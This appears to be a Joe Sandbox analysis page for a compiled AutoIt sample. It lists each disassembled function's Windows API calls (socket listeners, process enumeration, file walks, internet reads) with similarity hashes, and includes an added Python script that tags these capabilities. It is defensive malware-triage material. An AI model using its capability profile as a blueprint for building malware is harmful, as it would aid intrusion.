• Opcode Fuzzy Hash: 46d483c2f8b7716fc363b943757c68e4d18274d072ec1be0ce0253f3912ddcdb
• Instruction Fuzzy Hash: B901A7B175D3726EF7285678BC5BBFF72589B047A4F152824FD83B20D2D9A09E4081A4
                                                                                                                  APIs
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E38CA8
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E38CB7
                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 00E38CD3
                                                                                                                  • listen.WS2_32(00000000,00000005), ref: 00E38CE2
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E38CFC
                                                                                                                  • closesocket.WS2_32(00000000), ref: 00E38D10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279440585-0
                                                                                                                  • Opcode ID: 8f5a545b72e08063b5fd91ce1e8f08768d903aa72cc0888d74140d5edd8052e8
                                                                                                                  • Instruction ID: 3adcb983bb9b4e1946d79bfbbeb20a80765bf9cc7d81d6025190a202e7f72775
                                                                                                                  • Opcode Fuzzy Hash: 8f5a545b72e08063b5fd91ce1e8f08768d903aa72cc0888d74140d5edd8052e8
                                                                                                                  • Instruction Fuzzy Hash: AF21D0316002009FCB10EF28DE49B6EBBE9EF48754F249159F956B72D2CB70AD45CB62
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E26554
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E26564
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00E26583
• __wsplitpath.LIBCMT ref: 00E265A7
• _wcscat.LIBCMT ref: 00E265BA
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E265F9
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
• String ID:
• API String ID: 1605983538-0
• Opcode ID: b2302f7814033e51883711038ee4378e00e331d4d43e41b77f4e956b27d31439
• Instruction ID: 41e8a031aaf6ce5c9e69503bfea3a5767bb50784d4e0a97a14587cf3678b0795
• Opcode Fuzzy Hash: b2302f7814033e51883711038ee4378e00e331d4d43e41b77f4e956b27d31439
• Instruction Fuzzy Hash: 5C219571904218AFDB10ABA5DC88FEEB7FCAB09304F5015A5E505F7141DBB59F85CB60
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E213DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: lstrlen
• String ID: ($,2$<2$|
• API String ID: 1659193697-916407979
• Opcode ID: 846f325e087aa71758ed29e4b29e9e10aa752b38cc1a03c3b74225b0fdc07f10
• Instruction ID: bd6d57a19e062fde79ec00421cbbb0ceb009bc0c2f12a0811e6a5e15d920296d
• Opcode Fuzzy Hash: 846f325e087aa71758ed29e4b29e9e10aa752b38cc1a03c3b74225b0fdc07f10
• Instruction Fuzzy Hash: 29324775A007159FC728DF29D4809AAB7F0FF58314B11D4AEE59AEB3A1D770EA41CB40
APIs
  • Part of subcall function 00E3A82C: inet_addr.WS2_32(00000000), ref: 00E3A84E
• socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00E39296
• WSAGetLastError.WS2_32(00000000,00000000), ref: 00E392B9
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: 576d1dfab287868d025e725a6709e770a49173e8f5d2610d45fa1aaa6e84c68b
• Instruction ID: f60ff07ff1a7b701be23cc53288e1ed6d2f74adf552cc04700ffc88548d0625e
• Opcode Fuzzy Hash: 576d1dfab287868d025e725a6709e770a49173e8f5d2610d45fa1aaa6e84c68b
• Instruction Fuzzy Hash: 3B41C170600204AFDB14AB68CC46E7F77EDEF44764F158448FA56AB2D2CBB49D018BB1
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00E2EB8A
• _wcscmp.LIBCMT ref: 00E2EBBA
• _wcscmp.LIBCMT ref: 00E2EBCF
• FindNextFileW.KERNEL32(00000000,?), ref: 00E2EBE0
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E2EC0E
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
• Opcode ID: 0236f273c9640f8f83e06a674c063bc224107e89746eca5cf697cbcac6d6904f
• Instruction ID: a01b094b3fd085a5211ee815e0a716d93c8eb878425e27a1ed7913efdaa56779
• Opcode Fuzzy Hash: 0236f273c9640f8f83e06a674c063bc224107e89746eca5cf697cbcac6d6904f
• Instruction Fuzzy Hash: 9A41F0346043118FCB18DF68D891AAAB3E4FF49324F10855DFA5ADB3A1DB31E940CBA1
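The four API listings above (the TCP socket/bind/listen routine at 00E38CA8, the CreateToolhelp32Snapshot/Process32FirstW/Process32NextW loop at 00E26554, the socket/inet_addr routine at 00E39296 and the FindFirstFileW/FindNextFileW walk at 00E2EB8A) are the raw material an analyst turns into capability tags during triage. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses the report's "APIs" lines as they appear on this page (embedded here as a constructed excerpt), decodes the hex arguments that carry meaning (the socket address family, type and protocol; the TH32CS_SNAPPROCESS flag; the 0x22C dwSize that equals sizeof(PROCESSENTRY32W) on 32-bit) and assigns tags per function. The tag names and the regex are this example's own choices. One caveat the report itself implies: the sample is flagged as a compiled AutoIt script, so these routines belong to the AutoIt runtime shipped inside the executable; a tag says the capability is linked in, not that the embedded script actually used it in this run.

```python
import re

# Constructed excerpt: the "APIs" call lines of four function blocks, copied from
# this report page. Only the call lines and the block delimiters are needed.
REPORT_EXCERPT = """\
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E38CA8
• WSAGetLastError.WS2_32(00000000), ref: 00E38CB7
• bind.WS2_32(00000000,?,00000010), ref: 00E38CD3
• listen.WS2_32(00000000,00000005), ref: 00E38CE2
• WSAGetLastError.WS2_32(00000000), ref: 00E38CFC
• closesocket.WS2_32(00000000), ref: 00E38D10
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E26554
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E26564
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00E26583
• __wsplitpath.LIBCMT ref: 00E265A7
• _wcscat.LIBCMT ref: 00E265BA
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E265F9
Memory Dump Source
APIs
  • Part of subcall function 00E3A82C: inet_addr.WS2_32(00000000), ref: 00E3A84E
• socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00E39296
• WSAGetLastError.WS2_32(00000000,00000000), ref: 00E392B9
Memory Dump Source
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00E2EB8A
• _wcscmp.LIBCMT ref: 00E2EBBA
• _wcscmp.LIBCMT ref: 00E2EBCF
• FindNextFileW.KERNEL32(00000000,?), ref: 00E2EBE0
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E2EC0E
Memory Dump Source
"""

# One report call line: optional "Part of subcall function XXXX:" prefix,
# "api.MODULE(args), ref: ADDR" or "api.MODULE ref: ADDR" for CRT calls.
CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Winsock constants for the first three socket() arguments (assumed IPv4-centric subset).
SOCKET_FAMILY = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
SOCKET_PROTO = {0: "default", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
TH32CS_SNAPPROCESS = 0x2
SIZEOF_PROCESSENTRY32W = 0x22C  # 556 bytes on 32-bit Windows


def parse_blocks(text):
    """Split the listing into per-function call lists (one per 'APIs' heading)."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            blocks.append(current)
        elif stripped == "Memory Dump Source":
            current = None
        elif current is not None:
            m = CALL_RE.match(line)
            if m:
                current.append({
                    "api": m.group("api"),
                    "module": m.group("module"),
                    "args": [a for a in (m.group("args") or "").split(",") if a],
                    "ref": m.group("ref"),
                    "indirect": m.group("sub") is not None,  # reached via a subcall
                })
    return [b for b in blocks if b]


def hex_arg(args, i):
    """Return argument i as an int, or None for '?' (unresolved by the sandbox)."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def decode_socket(args):
    """Translate socket(af, type, protocol) into symbolic Winsock names."""
    af, typ, proto = hex_arg(args, 0), hex_arg(args, 1), hex_arg(args, 2)
    return (SOCKET_FAMILY.get(af, f"af={af}"),
            SOCKET_TYPE.get(typ, f"type={typ}"),
            SOCKET_PROTO.get(proto, f"proto={proto}"))


def tag_block(calls):
    """Derive capability tags from the set of APIs and their decoded arguments."""
    names = {c["api"] for c in calls}
    by_name = {c["api"]: c for c in calls}
    tags = []
    if {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= names:
        flags = hex_arg(by_name["CreateToolhelp32Snapshot"]["args"], 0)
        size = hex_arg(by_name["Process32FirstW"]["args"], 1)
        # Only tag when the snapshot is of processes and dwSize matches the W struct.
        if flags == TH32CS_SNAPPROCESS and size == SIZEOF_PROCESSENTRY32W:
            tags.append("process-enumeration")
    if {"FindFirstFileW", "FindNextFileW"} <= names:
        tags.append("directory-walk")
    for c in calls:
        if c["api"] == "socket":
            fam, typ, proto = decode_socket(c["args"])
            tags.append(f"socket:{fam}/{typ}/{proto}")
    if {"bind", "listen"} <= names:
        tags.append("listening-server")
    if "inet_addr" in names:
        tags.append("ip-from-string")
    return tags


def triage(text):
    """Tag every function block; 'site' is the lowest direct call address in the block."""
    result = []
    for calls in parse_blocks(text):
        direct = [c for c in calls if not c["indirect"]]
        site = min((c["ref"] for c in direct), key=lambda r: int(r, 16))
        result.append({"site": site, "apis": [c["api"] for c in calls], "tags": tag_block(calls)})
    return result


if __name__ == "__main__":
    for fn in triage(REPORT_EXCERPT):
        print(fn["site"], ", ".join(fn["tags"]))
```

Run against the excerpt, the UDP routine at 00E39296 decodes to AF_INET/SOCK_DGRAM/IPPROTO_UDP (0x11 is 17), which distinguishes it from the TCP listener at 00E38CA8 even though both blocks show only "socket" in the report's condensed API ID. Extending the rules to other blocks on the page (for example LookupPrivilegeValue/AdjustTokenPrivileges with the SeShutdownPrivilege string) is a matter of adding a name set and, where the arguments matter, a decoder.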
APIs
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 9e723e65fe5c6dae46bd626827373b4cbaf91c908a711f3e59aa5e8c1383c7ab
• Instruction ID: 8e37a03d19d4d3ccc052d6832272fb194a198595a416f9bb53a6a1dc453a2dee
• Opcode Fuzzy Hash: 9e723e65fe5c6dae46bd626827373b4cbaf91c908a711f3e59aa5e8c1383c7ab
• Instruction Fuzzy Hash: E111BF317012106FE7216F26ED44E6FBB9CEF547A4F45542AF84AF7281CF70A90286B5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-1546025612
• Opcode ID: d29de01f0b8804ad36158caa927a5f146fafb8a90ba48e2b80724ad29026188f
• Instruction ID: e2c8b964af15a3053a626002f17c08f67aae4a4e1034574a1afe2b1716803c35
• Opcode Fuzzy Hash: d29de01f0b8804ad36158caa927a5f146fafb8a90ba48e2b80724ad29026188f
• Instruction Fuzzy Hash: 08929B71E0125ACBDF24DF59C8907BDB7B1AF54354F24819AE85AFB280D730AD81CBA1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E4F211
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E5E4C0,?,?,?,?,?), ref: 00E4F226
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E4F270
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E5E4C0,?,?,?), ref: 00E4F2A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423138444-0
                                                                                                                  • Opcode ID: 2f8212bcee77d47b2290685ddb5438fbd46eb0b64bd4412a29b4d762beb63522
                                                                                                                  • Instruction ID: d3dc01e41dec1b61166b9c8dbb6d5ff4070ed60bb851eea0624307ee82ccba10
                                                                                                                  • Opcode Fuzzy Hash: 2f8212bcee77d47b2290685ddb5438fbd46eb0b64bd4412a29b4d762beb63522
                                                                                                                  • Instruction Fuzzy Hash: BA21A039600028EFCB158F95EC58EFE7BB5EF4AB54F088469F905AB2B1D3709950DB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 00DFB5A5
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00E5E69A
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E5E6A4
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00E5E6AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1010295502-0
                                                                                                                  • Opcode ID: a351b82335458b61ab289159f1e20350aae6d76696163e9455b0b4db15f39f53
                                                                                                                  • Instruction ID: 64564fb0c9d7bbc9ead9b6bc8b3555be65a3bb79a2621a1540aa0d079e03fe47
                                                                                                                  • Opcode Fuzzy Hash: a351b82335458b61ab289159f1e20350aae6d76696163e9455b0b4db15f39f53
                                                                                                                  • Instruction Fuzzy Hash: 4D112531A04029BFCB149F98DC458BE77B8EB49319F414452EA42E7240D774AA99CBB1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00DFB22F
                                                                                                                    • Part of subcall function 00DFB55D: NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 00DFB5A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_$LongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1155049231-0
                                                                                                                  • Opcode ID: c2fc8afdb8a3940f5640f4d43dc7e49e8a9f9fdb73aed6a31bd5ef75d9adbc30
                                                                                                                  • Instruction ID: 83951c6cc0154132f24196f0f800d0c2dc752efd6ef10bcf89a1b3331b68b289
                                                                                                                  • Opcode Fuzzy Hash: c2fc8afdb8a3940f5640f4d43dc7e49e8a9f9fdb73aed6a31bd5ef75d9adbc30
                                                                                                                  • Instruction Fuzzy Hash: E4A1AA7010410CFAD72C6F2ADC88D7F299CEB86365F1AC51BFA81F6292CB15DE049276
                                                                                                                  APIs
                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E343BF,00000000), ref: 00E34FA6
                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E34FD2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 599397726-0
                                                                                                                  • Opcode ID: d783361ebc0b5fe953768603f2e53f077a340e9c0960785d4031039b7bdbb63d
                                                                                                                  • Instruction ID: d06f947204fd5b1e3776be68bc010fa63927bb5ebcb9470f563a1299d60febfb
                                                                                                                  • Opcode Fuzzy Hash: d783361ebc0b5fe953768603f2e53f077a340e9c0960785d4031039b7bdbb63d
                                                                                                                  • Instruction Fuzzy Hash: 8341FAB2604309BFEB208E90DC89EBF7BBCEB40358F14605EF205761C1D671AE41DAA0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: \Q
                                                                                                                  • API String ID: 4104443479-1011046347
                                                                                                                  • Opcode ID: 6821d9771031627f7828e900fb360c2b3d0192cfc7a98725a1a224065115f8e0
                                                                                                                  • Instruction ID: 936b9b60b4ba3895d44950490528cbf7a964b69e701698d3d8f0558cb9f8529a
                                                                                                                  • Opcode Fuzzy Hash: 6821d9771031627f7828e900fb360c2b3d0192cfc7a98725a1a224065115f8e0
                                                                                                                  • Instruction Fuzzy Hash: 83A26C70E04259CFDB24DF59C8806ADBBB1FF48354F2581AAD859AB391D7309E81DFA0
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00E2E20D
                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E2E267
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E2E2B4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
